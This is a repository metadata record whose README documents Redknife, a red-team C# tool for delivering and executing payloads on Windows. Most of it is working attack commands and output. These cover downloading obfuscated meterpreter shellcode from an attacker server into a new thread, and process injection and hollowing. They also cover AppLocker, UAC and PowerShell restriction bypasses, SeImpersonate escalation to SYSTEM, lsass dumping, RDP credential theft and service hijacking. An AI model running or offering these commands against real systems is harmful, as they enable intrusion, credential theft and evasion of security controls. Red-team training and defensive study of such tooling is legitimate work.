{"id":19436589,"url":"https://github.com/ka7ana/redknife","last_synced_at":"2026-04-27T17:33:08.963Z","repository":{"id":223197299,"uuid":"759566311","full_name":"ka7ana/Redknife","owner":"ka7ana","description":"A command-line payload delivery and execution tool","archived":false,"fork":false,"pushed_at":"2024-02-28T13:55:34.000Z","size":55,"stargazers_count":2,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-07-02T02:07:00.088Z","etag":null,"topics":["command-line","command-line-tool","console","console-application","csharp","dotnet","offensive-security","offsec","osep","pen-300","pentesting-tools","red-team","red-team-tools","red-teaming"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ka7ana.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-02-18T22:08:40.000Z","updated_at":"2025-01-20T01:15:28.000Z","dependencies_parsed_at":"2024-02-18T23:28:31.152Z","dependency_job_id":"5ec6fade-9bd6-4c5e-b2e5-277098f7217c","html_url":"https://github.com/ka7ana/Redknife","commit_stats":null,"previous_names":["ka7ana/redknife"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ka7ana/Redknife","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/releases","manifests_ur
l":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ka7ana","download_url":"https://codeload.github.com/ka7ana/Redknife/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ka7ana%2FRedknife/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32348048,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-27T17:12:42.749Z","status":"ssl_error","status_checked_at":"2026-04-27T17:12:41.658Z","response_time":128,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["command-line","command-line-tool","console","console-application","csharp","dotnet","offensive-security","offsec","osep","pen-300","pentesting-tools","red-team","red-team-tools","red-teaming"],"created_at":"2024-11-10T15:11:56.814Z","updated_at":"2026-04-27T17:33:08.947Z","avatar_url":"https://github.com/ka7ana.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Redknife\n\nA command-line payload delivery and execution tool.\n\nRedknife obtains a payload from either a URL, file or directly via a command-line argument. This payload can contain encoded shell buffers, commands to execute etc. 
- functionality is dependent on the module specified.\n\nRedknife's main functionality is delivered via modules - when launching Redknife, a module is specified via the `--module` arg. Modules exist for spawning new threads, injecting into processes, process hollowing etc., as well as other utilities such as executing shell commands and creating PowerShell runspaces (allowing for constrained language mode bypass).\n\nRedknife can be run as an InstallUtil uninstaller, potentially allowing Redknife to bypass AppLocker restrictions. Redknife can also be serialised by James Forshaw's DotNetToJScript tool, for use in CScript JavaScript/HTA files.\n\n## Parameters\n\nRedknife supports a number of different arguments.\n\n### General arguments\n\n- `--debug` - Sets the log level to debug (default log level is `INFO`).\n- `--quiet` - Suppresses all output. This option overrides the `--debug` flag.\n- `--help` - Outputs the help info.\n- `--evasion` - Whether to try basic evasion techniques (such as a sleep timer) to evade detection.\n\n### Arguments relating to the payload supplied to Redknife\n\n- `--file FILE` - Specifies the path of the file to load the payload from.\n- `--url URL` - Specifies a URL to load the payload from.\n- `--payload PAYLOAD` - Specifies the payload directly as an argument.\n- `--transforms TRANSFORMS` - The comma-delimited list of transformations to apply to the payload.\n\n### Arguments instructing Redknife what to do\n\n- `--module MODULE` - Specifies the module to execute the payload on.\n- `--escalate ESCALATE_MODULE` - Specifies the name of the escalation type to perform to obtain privilege escalation.\n\n### Arguments used by specific modules\n\nNote that the functionality supplied by these arguments is dependent on the module used.\n\n- `--process PROCESS_NAME` - The process name to operate on. This is overridden if `--pid` is also specified.\n- `--pid PID` - The process ID to operate on. 
If specifying both a `--pid` and a `--process` value, `--pid` overrides `--process`. \n- `--output-file FILE` - The output file to write to.\n- `--pipe-name NAME` - The name of the named pipe to operate on.\n- `--host-name HOST` - The host name to target in the specified module (e.g. in the `hijack-remote-service` module).\n- `--service-name SERVICE` - The name of the service to target (e.g. in the `hijack-remote-service` module).\n\n## Modules\n\nRedknife has the following modules (as listed in `ComponentDefinitions.cs`):\n\n- `exec-ps` - Executes the payload as a PowerShell script (maps to `Modules/PowerShellScript.cs`)\n- `new-thread` - Spawns a new thread to execute the payload in (maps to `Modules/SpawnNewThread.cs`)\n- `process-inject` - Injects the payload and creates a thread in the process defined by the `--pid` or `--process` parameter (maps to `Modules/SimpleProcessInjection.cs`)\n- `nt-process-inject` - Injects the payload and creates a thread in the process (using `NtDLL` methods) defined by the `--pid` or `--process` parameter (maps to `Modules/NtProcessInjection.cs`)\n- `process-hollow` - Starts an instance of `svchost.exe`, which is then hollowed and replaced with the payload (maps to `Modules/ProcessHollower.cs`)\n- `shell-cmd` - Executes a shell command, defined in the payload, as specified by either the `--file`, `--url` or `--payload` parameter (maps to `Modules/ExecuteShellCommand.cs`)\n- `process-dump` - Dumps a process' memory. Specify the ID or name of the process to dump via the `--pid` or `--process` arguments respectively. The output file can be controlled via `--output-file` (otherwise defaults to %TEMP% - maps to `Modules/ProcessMemoryDump.cs`)\n- `rdp-thief` - Injects the `RDPThief.dll` into running `mstsc` processes. The payload passed to the module must represent the path to the `RDPThief.dll` on the target system (this is not written by Redknife) (maps to `Modules/RDPThief.cs`)\n- `hijack-remote-service` - Lateral movement via reconfiguration of a remote service. 
The current user should have permission to edit the service on the remote host. Use `--service-name` to specify the service and `--host-name` to specify the remote machine (maps to `Modules/HijackRemoteService.cs`)\n\n## Escalation/UAC bypass\n\nRedknife has the following escalation/UAC bypass modules:\n\n- `FODHelper` - sets the appropriate registry keys and relaunches Redknife using the FOD Helper UAC bypass. All arguments passed to Redknife are preserved and passed to the re-launched instance of Redknife.\n- `NamedPipeSeImpersonate` - creates a named pipe (defined by `--pipe-name`)\n\n## Transforms\n\nRedknife can apply the following transforms to a payload:\n\n- `base64` - base64 decodes the payload\n- `xor=VALUE` - XORs the payload with the specified string value\n- `caesar=VALUE` - performs a caesar shift on each byte in the payload. The shift value is determined by the value string, which must be numeric (although it can be negative).\n- `reverse` - reverses the payload\n\nThe order of the transforms matters: they must be listed in the reverse of the order in which the transformations were applied to the original payload.\n\nWhen specifying transforms, use a quoted string of comma-delimited transforms, e.g.: `--transforms \"base64,xor=foo,caesar=-5\"`\n\n## Specifying arguments in a text file\n\nSome situations might limit the parameters you can pass to an executable. As such, Redknife has the ability to read its args from a text file. Args should be specified in the same format as they would normally be passed as command-line args.\n\nRedknife has a predefined search order when looking for arg files - if a file is found, the search finishes:\n\n1. Redknife.txt in the current directory (i.e. the dir in which Redknife.exe is executing)\n2. ProcessName.txt in the current directory (i.e. in case the executable has been renamed)\n3. `C:\\redknife.txt`\n4. 
`C:\\PROCESS_NAME.txt` (in case the executable has been renamed)\n\n## DotNetToJScript\n\nThe Redknife executable can be encapsulated as a DotNetToJScript payload for inclusion in a JScript/VBScript/HTA file.\n\nAs Redknife loads a staged payload from a file or URL, a number of arguments must be supplied. As such, it is necessary to supply the `-s` parameter to `DotNetToJScript.exe` and include an additional JScript block that calls the required Redknife functionality.\n\nAs an example, to load a remote payload and execute it in a new thread within the Redknife process, the following additional JScript would be supplied:\n\n```JavaScript\n// Define the args for Redknife\nvar RedknifeArgs = \"--url http://192.168.45.208:9000/Redknife.payload --module new-thread --transforms base64,xor=foo,caesar=-5\";\no.ParseArgumentsFromString(RedknifeArgs);\no.Run();\n```\n\nThese args are passed to the Redknife instance once it has been created.\n\nAssuming the args above have been saved in a file named `redknife-args.txt`, the command to generate a Redknife JavaScript file is:\n\n```cmd\nDotNetToJScript.exe Redknife.exe -l JScript -v v4 -c Redknife.Redknife -s redknife-args.txt -o redknife.js\n```\n\nNote that the `-c Redknife.Redknife` arg is the name of the class that gets created by DotNetToJScript - in this case, it's an instance of class `Redknife` within the `Redknife` namespace. Once the class has been created, the additional snippet of script (defined in `redknife-args.txt`) calls `ParseArgumentsFromString` on the created `Redknife` class, passing in the string representation of the args. 
It then calls `Run` on the created class, which kicks off the main Redknife functionality.\n\nOnce `redknife.js` has been generated, any changes to the args to pass to Redknife can simply be made in the generated JS file itself, rather than generating a new file using DotNetToJScript.\n\nThe generated JS file can be tested from cscript.exe using the following command:\n\n```cmd\ncscript.exe redknife.js\n```\n\n### Notes\n\n- `cscript.exe` creates a 64-bit process - use a 64-bit payload and an appropriate Metasploit handler.\n\n## PowerShell Execution\n\nRedknife includes a PowerShell language execution module, which can execute PowerShell in environments where PS is restricted, or where PowerShell is limited to restricted language mode.\n\nTo invoke this module, use the `--module exec-ps` command line argument. The PowerShell code should be supplied as the payload to the module.\n\n**Note:** Aside from the normal transformations, if the PowerShell module detects that the payload is Base64 encoded (i.e. the length is a multiple of 4 and the payload matches the Base64 regex) then it will attempt to Base64 decode the payload before execution.\n\n### Examples\n\n#### Script execution via `exec-ps`\n\n```PowerShell\nRedknife.exe --module exec-ps --payload \"(Get-Content C:\\\\Tools\\\\PowerUp.ps1 -Raw) | IEX; Invoke-AllChecks | Out-File -FilePath C:\\\\Tools\\\\output.txt\" --debug\n```\n\nThe snippet above reads the `PowerUp.ps1` script from `C:\\\\Tools`, calls `Invoke-Expression` to add the PowerUp code to the context and then calls the `Invoke-AllChecks` method (added by the script). 
Output is redirected to a specific output file (although Redknife will print the output to the console, it isn't formatted as well as it would otherwise be).\n\n#### Listing processes and displaying output\n\n```PowerShell\nRedknife.exe --module exec-ps --payload \"Get-Process | Format-Table | Out-String\" --debug\n```\n\nGets the currently running processes, formats the output in table form and converts it to a string.\n\n## Running Redknife as an InstallUtil uninstall script (LOLBin)\n\nYou can run `Redknife.exe` as an uninstall target for the Microsoft .NET Framework `installutil.exe` utility (\"living off the land binary\" - LOLBin), which is located in directory `C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\`.\n\nInstallUtil will attempt to uninstall the executable specified in the command, and call the executable's `Uninstall` method. When running in this mode, you cannot pass arguments to Redknife - you must place a plain text argument file (containing the args to parse) in one of the predefined locations:\n\n1. The same local directory in which the Redknife executable is located\n2. The current Environment temp folder (returned by `Path.GetTempPath()`)\n3. The root `C:\\` directory\n\nFor each of these locations, Redknife first attempts to load a file named `Redknife.txt`, then, if the name of the executing assembly is different (i.e. you have renamed Redknife.exe), `APPNAME.txt` (where APPNAME represents the name of the executable).\n\nRedknife can call any module you would normally be able to call from this method (previously only PowerShell commands could be executed).\n\n### Example Invocation\n\n#### Noisy - shows Redknife output on console\n\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\installutil.exe /logfile= /LogToConsole=false /U C:\\Windows\\Tasks\\Redknife.exe\n```\n\n## Dumping process memory\n\nRedknife has a module (`process-dump`) that allows it to dump a process' memory. 
The process to dump should be specified, either by name using the `--process` argument, or by ID using `--pid`. \n\nThis calls the `MiniDumpWriteDump` method in the `Dbghelp` DLL.\n\nIf no `--output-file` is provided, the dump is saved to the same directory that Redknife is executing from, with a filename in the format `Process_PROCESSNAME_DATETIME.dmp`. \n\nIf `--output-file` is a directory, the default file name (`Process_PROCESSNAME_DATETIME.dmp`) is output to the specified directory. If `--output-file` specifies a file, the dump is written to the specified path.\n\n### Examples\n\n#### Dump lsass process by name to current directory\n\n```cmd\nC:\\temp\u003eRedknife.exe --module process-dump --process lsass --debug\n```\n\n#### Dump lsass process by ID to specified path\n\n```cmd\nRedknife.exe --module process-dump --pid 612 --output-file C:\\lsass.dmp\n```\n\n## Pre-Canned Examples\n\n### Executing PowerShell via InstallUtil Uninstall\n\nSave the `Redknife.txt` file within the same directory as the Redknife executable:\n\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\Temp\\Redknife.exe\n```\n\n### Priv Esc via Named Pipe and Process Hollowing\n\nMeterpreter payload generated using:\n\n```bash\nmsfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.45.215 LPORT=8080 -f raw \u003e Redknife.payload\n```\n\nRunning a Python web server to serve the payload:\n\n```bash\n└─$ python -m http.server 9000\nServing HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...\n192.168.240.10 - - [15/Jan/2024 15:18:44] \"GET /Redknife.payload HTTP/1.1\" 200 -\n```\n\nRedknife invocation:\n\n```cmd\nC:\\Windows\\system32\u003eC:\\Temp\\Redknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name foobar --module process-hollow --url http://192.168.45.215:9000/Redknife.payload\n```\n\n### Priv Esc with raw payload and recursive invocation\n\nSome PrivEsc methods work with modules, others are a bit more fiddly. 
For instance, privesc with process hollowing works on some boxes, but not others. PrivEsc with `shell-cmd` works well (as the new process used to launch the shell cmd will use the elevated token); however, this isn't really applicable if you don't have an executable or script that you can launch via a shell command (i.e. this requires dropping a script on disk before the Redknife invocation).\n\nIf you have a raw meterpreter payload and want to call this directly, use a recursive invocation:\n\n```cmd\nC:\\Temp\u003eRedknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name foobar --module shell-cmd --payload \"C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.228:9000/Redknife.payload\"\n```\n\nThis launches Redknife twice - the first instance performs the Priv Esc via NamedPipeSeImpersonate. The module for this instance is `shell-cmd`, and the payload is a raw payload containing the command to execute (which, in this case, is Redknife again). Once a privileged process connects to the named pipe, the first instance of Redknife copies the token and launches the command in the payload (which is Redknife), launching a new instance of Redknife with elevated privileges from the outset. In the above example, the second Redknife instance reads its payload from a URL, which is then executed in a new thread in the current (elevated) Redknife process. 
From here, we can use any module we like without worrying whether the module is compatible with the escalation method.\n\n### Redknife as PrintSpoofer (PetitPotam) with EXE payload\n\n```\nC:\\Temp\u003eRedknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name \"test\\pipe\\spoolss\" --module shell-cmd --payload \"C:\\Temp\\met.exe\"\n```\n\nThen, from another Windows shell (on the same box):\n\n```\nC:\\\u003e C:\\path\\to\\SpoolSample.exe hostname hostname/pipe/test\n```\n\n### Redknife as PrintSpooler (PetitPotam) with obfuscated, remote shellcode payload\n\nGenerate a payload and obfuscate it (i.e. XOR, caesar shift etc).\n\nI.e.:\n\n```\n└─$ python rk-encode-payload.py --payload payloads/payload.ps1 --transforms=\"caesar=5,xor=foo\"\n[+] Read payload from file: payloads/payload.ps1\n[-]   Payload:\n0xfc,0x48,0x83,...0xa,0x41,0x89,0xda,0xff,0xd5\n\n[+] Transforms to apply caesar=5,xor=foo\n[-]   Applying caesar shift of 5\n[-]   XORing payload with phrase: foo\n[+] Transformed payloads:\n[-]   Raw byte array\n[103, 34, 231, 143, 154, 130, 183, 106, 106, 99, 41, 57, 32, 58, 56, 43, 89, 184, 48, 5, 34, 246, ...225, 176, 98, 181]\n----------------------------------------------------------------------------------------------------\n[-]   Formatted byte array\n0x67,0x22,0xe7,0x8f,0x9a,0x82,0xb7,0x6a,0x6a,0x63,0x29,0x39,0x20,0x3a,0x38,0x2b,0x59,0xb8,0x30,0x5,0x22...0x20,0xe1,0xb0,0x62,0xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex string\n6722e78f9a82b76a6a6...20e1b062b5\n----------------------------------------------------------------------------------------------------\n[-]   'X' hex 
string\n\\x67\\x22\\xe7\\x8f\\x9a\\x82\\xb7\\x6a\\x6a\\x63\\x29\\x39\\x20\\x3a\\x38\\x2b\\x59\\xb8\\x30\\x05\\x22\\xf6\\x38\\x0a\\x2b\\...\nx32\\xa7\\x3b\\x00\\x6a\\x38\\xaf\\x8a\\x44\\x40\\x60\\x20\\xe1\\xb0\\x62\\xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex dump\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b \n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44 \n40 60 20 e1 b0 62 b5 \n----------------------------------------------------------------------------------------------------\n[-]   Base64\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\n----------------------------------------------------------------------------------------------------\n```\n\nSave the Base64 output as `payloads/Redknife.payload` on server.\n\nNeed to launch Redknife from Redknife itself - first invocation executes the priv esc via PrintSpooler\n\n```\nC:\\Tools\u003eRedknife.exe --debug --escalate NamedPipeSeImpersonate --pipe-name \"test\\pipe\\spoolss\" --module shell-cmd --payload \"cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \\\"base64,xor=foo,caesar=-5\\\"\"\n[\u003e] Starting Redknife with options:\n[-]   - URL:\n[-]   - File:\n[-]   - Use Evasion: False\n[-]   - Escalate: NamedPipeSeImpersonate\n[-]   - Module: shell-cmd\n[-]   - PID:\n[-]   - Process Name:\n[-]   - Quiet: False\n[-]   - Debug: True\n[-]   - Help: False\n[+] Logging level: DEBUG\n[+] Loading payload from string provided: cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[-]   OK! 
Payload contains 159 bytes\n[+] Payload:\n================================================================\ncmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n================================================================\n```\n\nNow execute SpoolSample:\n\n```\nC:\\\u003e C:\\path\\to\\SpoolSample.exe hostname hostname/pipe/test\n```\n\nObserve output in Redknife:\n\n```\n[+] Performing privilege escalation\n[+] Executing NamedPipeSeImpersonate escalation...\n[-]   Creating named pipe: \\\\.\\pipe\\test\\pipe\\spoolss\n[-]   Connecting to named pipe: \\\\.\\pipe\\test\\pipe\\spoolss\n[-]   Connection received!\n[+] Client connected to named pipe '\\\\.\\pipe\\test\\pipe\\spoolss' with SID: S-1-5-18\n[-]   Escalation done\n[+] No payload transformations to apply\n[+] Executing shell command module...\n[\u003e] Launching executable: cmd.exe, with args: /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[+] Current thread has impersonation privilege - executing process with token\n[+] System directory is: C:\\Windows\\system32\n[+] Impersonated user is: NT AUTHORITY\\SYSTEM\n[+] Calling CreateProcessWithTokenW - payload: cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[\u003e] Executed with impersonated token: cmd.exe /C C:\\Temp\\Redknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n```\n\nThe payload for the above points to Redknife, launching a new-thread module which downloads the payload from URL http://192.168.45.167:9000/payloads/Redknife.payload. 
This payload is also obfuscated, so the 2nd Redknife invocation transforms the payload appropriately on launch:\n\n```\n[\u003e] Starting Redknife with options:\n[-]   - URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   - File:\n[-]   - Transforms:\n[-]     [1]: base64\n[-]     [2]: xor=foo\n[-]     [3]: caesar=-5\n[-]   - Use Evasion: False\n[-]   - Escalate:\n[-]   - Module: new-thread\n[-]   - PID:\n[-]   - Process Name:\n[-]   - Quiet: False\n[-]   - Debug: True\n[-]   - Help: False\n[+] Logging level: DEBUG\n[+] Attempting to read payload from URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   OK! Payload contains 865 bytes\n[+] Payload:\n================================================================\nZyLnj5qCt2pq...qY2prvCLnr0rloxbYDf9jK2mn7KoVsTKnOwBqOK+KREBgIOGwYrU=\n\n================================================================\n[+] Transforming payload - 3 pending transformations\n[\u003e] Initial buffer, before transformations:\nBUFFER:\n5a 79 4c 6e 6a 35 71 43 74 32 70 71 59 79 6b 35\n...\n4f 4b 2b 4b 52 45 42 67 49 4f 47 77 59 72 55 3d\n0a\n[\u003e] Finalised payload buffer:\nBUFFER:\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b\n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44\n40 60 20 e1 b0 62 b5\n[-]   Transforming buffer - XOR with key: foo\n[\u003e] Finalised payload buffer:\nBUFFER:\n01 4d 88 e9 f5 ed d1 05 05 05 46 56 46 55 57 4d\n36 d7 56 6a 4d 90 57 65 4d 90 57 1d 5b 4d 90 57\n...\n4d 06 c8 8a c5 7a d7 5d c8 5d 6f 05 5e c0 e5 22\n2f 0f 46 8e df 04 da\n[-]   Transforming buffer - Caesar with key: -5\n[\u003e] Finalised payload buffer:\nBUFFER:\nfc 48 83 e4 f0 e8 cc 00 00 00 41 51 41 50 52 48\n...\n48 01 c3 85 c0 75 d2 58 c3 58 6a 00 59 bb e0 1d\n2a 0a 41 89 da ff d5\n[+] Finished transforming buffer: applied 3 transformations\n[\u003e] Spawning new thread for payload\n[-]   Allocating memory for payload, size: 647 bytes\n[-]   Copying payload to allocated memory\n[-]   Creating new thread to execute 
payload\n[\u003e] Waiting for thread execution\n```\n\nMeterpreter output:\n\n```\n[*] Meterpreter session 3 opened (192.168.45.167:443 -\u003e 192.168.164.100:52120) at 2024-02-08 15:33:13 +0000\n\nmeterpreter \u003e \nmeterpreter \u003e getuid\nServer username: NT AUTHORITY\\SYSTEM\n\n```\n\n### Downloading an obfuscated payload from URL\n\nGenerate a payload and obfuscate it (i.e. XOR, caesar shift etc).\n\nI.e.:\n\n```\n└─$ python rk-encode-payload.py --payload payloads/payload.ps1 --transforms=\"caesar=5,xor=foo\"\n[+] Read payload from file: payloads/payload.ps1\n[-]   Payload:\n0xfc,0x48,0x83,...0xa,0x41,0x89,0xda,0xff,0xd5\n\n[+] Transforms to apply caesar=5,xor=foo\n[-]   Applying caesar shift of 5\n[-]   XORing payload with phrase: foo\n[+] Transformed payloads:\n[-]   Raw byte array\n[103, 34, 231, 143, 154, 130, 183, 106, 106, 99, 41, 57, 32, 58, 56, 43, 89, 184, 48, 5, 34, 246, ...225, 176, 98, 181]\n----------------------------------------------------------------------------------------------------\n[-]   Formatted byte array\n0x67,0x22,0xe7,0x8f,0x9a,0x82,0xb7,0x6a,0x6a,0x63,0x29,0x39,0x20,0x3a,0x38,0x2b,0x59,0xb8,0x30,0x5,0x22...0x20,0xe1,0xb0,0x62,0xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex string\n6722e78f9a82b76a6a6...20e1b062b5\n----------------------------------------------------------------------------------------------------\n[-]   'X' hex string\n\\x67\\x22\\xe7\\x8f\\x9a\\x82\\xb7\\x6a\\x6a\\x63\\x29\\x39\\x20\\x3a\\x38\\x2b\\x59\\xb8\\x30\\x05\\x22\\xf6\\x38\\x0a\\x2b\\...\nx32\\xa7\\x3b\\x00\\x6a\\x38\\xaf\\x8a\\x44\\x40\\x60\\x20\\xe1\\xb0\\x62\\xb5\n----------------------------------------------------------------------------------------------------\n[-]   Hex dump\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b \n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44 \n40 60 20 e1 b0 62 b5 
\n----------------------------------------------------------------------------------------------------\n[-]   Base64\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\n----------------------------------------------------------------------------------------------------\n```\n\nSave the Base64 output as `payloads/Redknife.payload` on the server.\n\nThe input transforms were `caesar=5,xor=foo` (as shown in the encoder output above), so the reverse process will be `base64,xor=foo,caesar=-5` - the leading `base64` accounts for the Base64 encoding of the saved payload, and the remaining transforms undo the original ones in reverse order.\n\nLaunch Redknife:\n\n```\nZ:\\Redknife\\RedknifeApp\\bin\\x64\\Release\u003eRedknife.exe --debug --module new-thread --url http://192.168.45.167:9000/payloads/Redknife.payload --transforms \"base64,xor=foo,caesar=-5\"\n[\u003e] Starting Redknife with options:\n[-]   - URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   - File:\n[-]   - Transforms:\n[-]     [1]: base64\n[-]     [2]: xor=foo\n[-]     [3]: caesar=-5\n[-]   - Use Evasion: False\n[-]   - Escalate:\n[-]   - Module: new-thread\n[-]   - PID:\n[-]   - Process Name:\n[-]   - Quiet: False\n[-]   - Debug: True\n[-]   - Help: False\n[+] Logging level: DEBUG\n[+] Attempting to read payload from URL: http://192.168.45.167:9000/payloads/Redknife.payload\n[-]   OK! 
Payload contains 865 bytes\n[+] Payload:\n================================================================\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\n\n================================================================\nBUFFER:\n5a 79 4c 6e 6a 35 71 43 74 32 70 71 59 79 6b 35\n49 44 6f 34 4b 31 6d 34 4d 41 55 69 39 6a 67 4b\n4b 2f 38 34 65 7a 51 69 39 6a 68 4b 4b 33 76 54\n...\n4b 32 6d 6e 37 4b 6f 56 73 54 4b 6e 4f 77 42 71\n4f 4b 2b 4b 52 45 42 67 49 4f 47 77 59 72 55 3d\n0a\nBUFFER:\n67 22 e7 8f 9a 82 b7 6a 6a 63 29 39 20 3a 38 2b\n59 b8 30 05 22 f6 38 0a 2b ff 38 7b 34 22 f6 38\n4a 2b 7b d3 29 20 22 f6 18 3a 34 59 a1 2b 59 aa\n...\n2b 69 a7 ec aa 15 b1 32 a7 3b 00 6a 38 af 8a 44\n40 60 20 e1 b0 62 b5\n[\u003e] Transforming buffer - XOR with key: foo\nBUFFER:\n01 4d 88 e9 f5 ed d1 05 05 05 46 56 46 55 57 4d\n36 d7 56 6a 4d 90 57 65 4d 90 57 1d 5b 4d 90 57\n...\n05 05 05 04 da 4d 88 c9 25 8a c5 79 b7 6b 90 0c\n4d 06 c8 8a c5 7a d7 5d c8 5d 6f 05 5e c0 e5 22\n2f 0f 46 8e df 04 da\n[\u003e] Transforming buffer - Caesar with key: -5\nBUFFER:\nfc 48 83 e4 f0 e8 cc 00 00 00 41 51 41 50 52 48\n31 d2 51 65 48 8b 52 60 48 8b 52 18 56 48 8b 52\n...\n48 01 c3 85 c0 75 d2 58 c3 58 6a 00 59 bb e0 1d\n2a 0a 41 89 da ff d5\n[\u003e] Spawning new thread for payload\n[-]   Allocating memory for payload, size: 647 bytes\n[-]   Copying payload to allocated memory\n[-]   Creating new thread to execute payload\n[\u003e] Waiting for thread execution\n```\n\n### Using Redknife to run Redknife-ad-enumerate PowerShell script\n\n```\n--debug --module exec-ps --url \"http://192.168.45.227:9000/Tools/Redknife-enum.ps1\"\n```\n\n### FODHelper UAC bypass\n\n```\nRedknife.exe --escalate FODHelper --module shell-cmd --payload \"cmd.exe\" --debug\n```\n\n### Hijacking a Service Executable\n\nRedknife can be used to change a service executable, either on localhost or a remote machine.\n\n```\nC:\\Tools\u003e Redknife.exe --debug --module hijack-remote-service --service-name SERVICENAME 
--host-name HOSTNAME --payload PAYLOAD\n```\n\nThe payload should contain the path to the executable with which to replace the service binary. The payload can also contain any parameters/command-line args to be passed to the service executable.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fka7ana%2Fredknife","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fka7ana%2Fredknife","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fka7ana%2Fredknife/lists"}